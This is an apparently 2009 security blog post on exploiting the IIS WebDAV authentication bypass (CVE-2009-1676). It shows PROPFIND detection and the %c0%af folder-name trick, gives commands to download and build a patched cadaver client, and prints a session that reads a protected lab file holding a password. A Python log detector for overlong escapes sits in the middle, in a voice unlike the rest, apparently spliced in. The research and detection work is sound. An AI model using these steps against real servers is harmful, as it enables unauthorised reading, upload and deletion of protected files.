WebDAV Detection, Vulnerability Checking and Exploitation
Ahoy! My name is Andrew and I’ve been playing with the recent IIS WebDAV authentication bypass vulnerability (CVE-2009-1676) and helping Ron with writing the nmap detection script (http-iis-webdav-vuln.nse) and testing it in the lab. Ron is in a meeting today so I thought I’d jump in where he left off and post a bit about how to detect if WebDAV is enabled and how to actually exploit a folder once you’ve determined it is vulnerable.
The first thing one should know when playing with this vulnerability is that the IIS server is not exploitable if the root folder is protected. Also if the root folder is protected, there is no way to determine if WebDAV is even enabled. That being said, if the root folder is _not_ protected then it’s time to break out the funky cold medina and have some fun.
Detecting if WebDAV is enabled
Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2
* IIS 5.0/Windows 2000 SP4
On IIS 6.0, WebDAV is disabled by default. On IIS 5.0 and 5.1, WebDAV is enabled by default and you must edit the registry to disable it.
My method of detection simply involves running a PROPFIND request on the server. This is the same basic PROPFIND request we used in the http-iis-webdav-vuln.nse script:
    PROPFIND / HTTP/1.1
    Host: xxx.xxx.xxx.xxx
    Content-Type: application/xml
    Content-Length: 298

    <?xml version="1.0" encoding="utf-8"?>
    <propfind xmlns="DAV:"><prop>
    <getcontentlength xmlns="DAV:"/>
    <getlastmodified xmlns="DAV:"/>
    <executable xmlns="http://apache.org/dav/props/"/>
    <resourcetype xmlns="DAV:"/>
    <checked-in xmlns="DAV:"/>
    <checked-out xmlns="DAV:"/>
    </prop></propfind>
When WebDAV is enabled, it should return “HTTP/1.1 207 Multi-Status”.
When WebDAV has been disabled, it should return “HTTP/1.1 501 Not Supported”.
This is the method I’ve implemented in the http-iis-webdav-vuln.nse script. It works great in the lab on IIS servers. If we get back anything other than a 207 or 501, we jump ship and report that the web server is not supported. An Ubuntu server running Apache, for instance, returns 405 Method Not Allowed.
Checking if a server is vulnerable
Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2
Tested not working on
* IIS 5.0/Windows 2000 SP4
The original script only used one type of check; it would first find a protected folder (/secret/) and then try inserting the %c0%af character after the first /. It would turn /secret/ into /%c0%afsecret/.
This worked fine on IIS 6.0 but did not work at all on IIS 5.0/5.1. After playing with it some more today, we managed to get it working on IIS 5.1. The trick with 5.1 is that the %c0%af character cannot be right after the / but must be somewhere in the middle of the folder name. This also works on IIS 6.0. I modified the script so that it uses the 5.1/6.0 check, turning /secret/ into /s%c0%afecret/.
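As an added example (not from the post or the nmap script), here is the defender's side of the %c0%af trick: a small Python detector that decodes any two-byte overlong UTF-8 escape in a requested URI to the ASCII character it aliases, and flags such requests in IIS-style log lines. The log lines and their field layout are constructed for this example; %c0%af is the one instance the post shows, the code handles the whole 0xC0/0xC1 overlong range.

```python
import re

# Two-byte UTF-8 escapes whose lead byte is 0xC0 or 0xC1 are always overlong:
# they encode a value below 0x80, i.e. a plain ASCII character.
OVERLONG_RE = re.compile(r"%(c[01])%([89ab][0-9a-f])", re.IGNORECASE)


def overlong_ascii(uri: str) -> list[tuple[str, str]]:
    """Return (escape, aliased ASCII char) for each overlong 2-byte sequence.

    110xxxxx 10yyyyyy decodes to (x << 6) | y; with a 0xC0/0xC1 lead byte that
    is < 0x80, so %c0%af aliases '/'. A strict decoder rejects these, a lenient
    one treats /s%c0%afecret/ as /s/ecret/.
    """
    hits = []
    for m in OVERLONG_RE.finditer(uri):
        lead, cont = int(m.group(1), 16), int(m.group(2), 16)
        hits.append((m.group(0), chr(((lead & 0x1F) << 6) | (cont & 0x3F))))
    return hits


# Constructed IIS-style log lines for this example (not from the post).
# Assumed field layout: date time cs-method cs-uri-stem cs-username c-ip sc-status
SAMPLE_LOG = """\
2009-05-20 14:29:01 PROPFIND / - 192.0.2.10 207
2009-05-20 14:29:03 PROPFIND /secret/ - 192.0.2.10 401
2009-05-20 14:29:04 PROPFIND /s%c0%afecret/ - 192.0.2.10 207
2009-05-20 14:30:11 GET /s%c0%afecret/password.txt - 192.0.2.10 200
2009-05-20 14:31:00 GET /index.html - 198.51.100.7 200
2009-05-20 14:31:05 GET /caf%c3%a9.html - 198.51.100.7 200
"""


def scan_log(text: str) -> list[dict]:
    """Flag requests whose URI carries an overlong escape, with the path it aliases."""
    alerts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue  # skip header, blank or malformed lines
        date, time, method, uri, _user, client, status = fields
        hits = overlong_ascii(uri)
        if not hits:
            continue  # valid multi-byte escapes such as %c3%a9 are not flagged
        aliased = uri
        for esc, ch in hits:
            aliased = aliased.replace(esc, ch)
        alerts.append({"time": f"{date} {time}", "client": client, "method": method,
                       "uri": uri, "aliased_uri": aliased, "status": int(status)})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['time']} {a['client']} {a['method']} {a['uri']} -> {a['aliased_uri']} ({a['status']})")
```

A 401 on a folder followed by a 207 on the same folder with an overlong escape from the same client, as in the constructed lines above, is the pattern worth alerting on.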
Finding a vulnerable server
Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2
Tested not working on
* IIS 5.0/Windows 2000 SP4
Now for the fun part. If you haven't turned on some funky cold medina yet, get to it because we’re almost done!
First thing we need to do is find a vulnerable server. I just happen to know of a Windows 2003 box in my lab running IIS 6.0 that is vulnerable (fully patched up to today, btw). Let's see how an nmap scan of this box with the updated script works out:
    > ./nmap -T4 -p80 --script=http-iis-webdav-vuln xxx.xxx.xxx.xxx

    Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDT
    Interesting ports on xxx.xxx.xxx.xxx:
    PORT   STATE SERVICE
    80/tcp open  http
    |_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdav

    Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds
Interesting! So now we know the server has WebDAV enabled and that there are three vulnerable folders.
Exploiting it!
Now we could do everything by telnet-ing over port 80, but that’s not much fun (believe me, it’s very tedious!) so I went looking for a WebDAV client. I stumbled upon a FOSS one called cadaver, and based purely on the name I grabbed it. Now cadaver itself is a great little command line WebDAV client, but I quickly realized it has a bunch of problems that won’t let us do what we wanted. The nice thing about FOSS is that it’s open, so we grabbed the cadaver-0.23.2 source and after hacking away at it for a while, we came up with a little patch that makes it quite easy to exploit a server. Check the patch itself for the gritty details, but basically it does the following:
1) Replace any “Depth: 0” header with “Depth: 1” (otherwise ls won’t work)
2) Append the header “Translate: f” to every request (otherwise get and probably others won’t work)
3) Insert the characters “%c0%af” into any URI request longer than 1 character.
So, grab the cadaver-0.23.2-h4x.patch and apply it to the cadaver-0.23.2 source from the cadaver website. Here are the commands:
    > mkdir cadaver-h4x
    > cd cadaver-h4x
    > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
    --snip--
    > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
    --snip--
    > tar xzvf cadaver-0.23.2.tar.gz
    --snip--
    > cd cadaver-0.23.2/
    > patch -p1 < ../cadaver-0.23.2-h4x.patch
    patching file lib/neon/ne_basic.c
    patching file lib/neon/ne_request.c
    patching file lib/neon/ne_uri.c
    > ./configure
    --snip--
    > make
    --snip--
Now we should have a patched, compiled version of cadaver, so start it up with the server that was identified as having a vulnerable folder earlier:
    > ./cadaver xxx.xxx.xxx.xxx
This should drop you to a “dav:/>” prompt. Now just cd into the vulnerable folder and check out what’s there:
    dav:/> cd secret
    dav:/secret/> ls
    Listing collection `/secret/': succeeded.
            password.txt                           7  May 19 10:40
    dav:/secret/> cat password.txt
    Displaying `/secret/password.txt':
    ron$pr0ns
    dav:/secret/>
And there you have it!
Here’s a list of commands that I’ve tested that work with the patched cadaver on a vulnerable folder:
* CD
* LS
* MOVE
* PUT
* GET
* CAT
* DELETE
Oddly enough, the COPY command does NOT work. We didn’t have time to investigate why, but the functionality can be duplicated by a get/local rename/put.
Also, this patched cadaver will not work for browsing regular WebDAV folders (non-vulnerable), so don’t try.
If anyone has been able to successfully exploit this on IIS 5.0 (Windows 2000), please contact me, we’ve been trying and can’t get it to work in the lab here.
Comments are welcome, you can also contact me by e-mail: andrew at andreworr dot ca